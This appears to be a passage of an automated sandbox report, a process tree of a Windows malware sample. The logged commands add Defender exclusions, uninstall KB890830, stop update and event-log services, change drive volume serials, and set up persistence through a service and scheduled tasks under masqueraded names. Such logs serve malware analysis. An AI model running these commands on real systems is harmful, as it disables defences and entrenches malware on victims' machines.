                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:1928
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU
                                                                        4⤵
                                                                          PID:2220
                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:1640
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD
                                                                          4⤵
                                                                            PID:2436
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:2892
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3
                                                                            4⤵
                                                                              PID:1796
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:2288
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE
                                                                              4⤵
                                                                                PID:1404
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2192
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4
                                                                                4⤵
                                                                                  PID:968
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1320
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T
                                                                                  4⤵
                                                                                    PID:820
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1788
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB
                                                                                    4⤵
                                                                                      PID:2176
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:556
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6
                                                                                      4⤵
                                                                                        PID:1544
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6
                                                                                          5⤵
                                                                                            PID:1076
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960
                                                                                          4⤵
                                                                                            PID:2476
                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960
                                                                                              5⤵
                                                                                                PID:1684
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH
                                                                                              4⤵
                                                                                                PID:2280
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH
                                                                                                  5⤵
                                                                                                    PID:1624
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0
                                                                                                  4⤵
                                                                                                    PID:1812
                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0
                                                                                                      5⤵
                                                                                                        PID:1552
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4
                                                                                                      4⤵
                                                                                                        PID:1072
                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4
                                                                                                          5⤵
                                                                                                            PID:2400
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB
                                                                                                          4⤵
                                                                                                            PID:1632
                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB
                                                                                                              5⤵
                                                                                                                PID:2408
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J
                                                                                                              4⤵
                                                                                                                PID:1924
                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J
                                                                                                                  5⤵
                                                                                                                    PID:2836
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97
                                                                                                                  4⤵
                                                                                                                    PID:2972
                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97
                                                                                                                      5⤵
                                                                                                                        PID:2352
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR
                                                                                                                      4⤵
                                                                                                                        PID:2900
                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR
                                                                                                                          5⤵
                                                                                                                            PID:2056
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR
                                                                                                                          4⤵
                                                                                                                            PID:2992
                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR
                                                                                                                              5⤵
                                                                                                                                PID:2772
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1
                                                                                                                              4⤵
                                                                                                                                PID:1616
                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1
                                                                                                                                  5⤵
                                                                                                                                    PID:1800
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7
                                                                                                                                  4⤵
                                                                                                                                    PID:1656
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7
                                                                                                                                      5⤵
                                                                                                                                        PID:2664
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7
                                                                                                                                      4⤵
                                                                                                                                        PID:2808
                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7
                                                                                                                                          5⤵
                                                                                                                                            PID:2516
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N
                                                                                                                                          4⤵
                                                                                                                                            PID:2820
                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N
                                                                                                                                              5⤵
                                                                                                                                                PID:2656
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                              4⤵
                                                                                                                                                PID:2652
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                4⤵
                                                                                                                                                  PID:1448
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2588
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2576
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2888
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2816
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1296
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:2592
                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:584
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1116
                                                                                                                                                                • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                  "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:2400
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\explorer.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2352
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2964
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fr-FR\lsass.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:776
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\taskhost.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2416
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:1552
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:1952
                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                        chcp 65001
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2476
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                          ping -n 10 localhost
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:1716
                                                                                                                                                                        • C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe
                                                                                                                                                                          "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2208
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:2220
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\.conhostsft.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  PID:2212
                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    PID:1208
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:268
                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:1104
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:1796
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:1772
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2964
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:1864
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2084
                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2700
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2244
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1632
                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2836
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2392
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:896
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2672
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2564
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\explorer.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2744
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2876
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2528
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2640
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2788
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2548
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2780
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1680
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2756
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\ChainReview\taskhost.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2752
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2516
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2552
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2600
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2948
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 7 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:2580
                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2320
                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1619450566910135647-1410053359-1672108338-1974789323748415161-1532368068-438134973"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1580
                                                                                                                                                                        • C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                          C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:3024
                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:2588
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2816
                                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                PID:1768
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1672
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2520
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2332
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2880
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1332
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2948
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2200
                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1444
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2232
                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                      C:\Windows\system32\conhost.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:604
                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
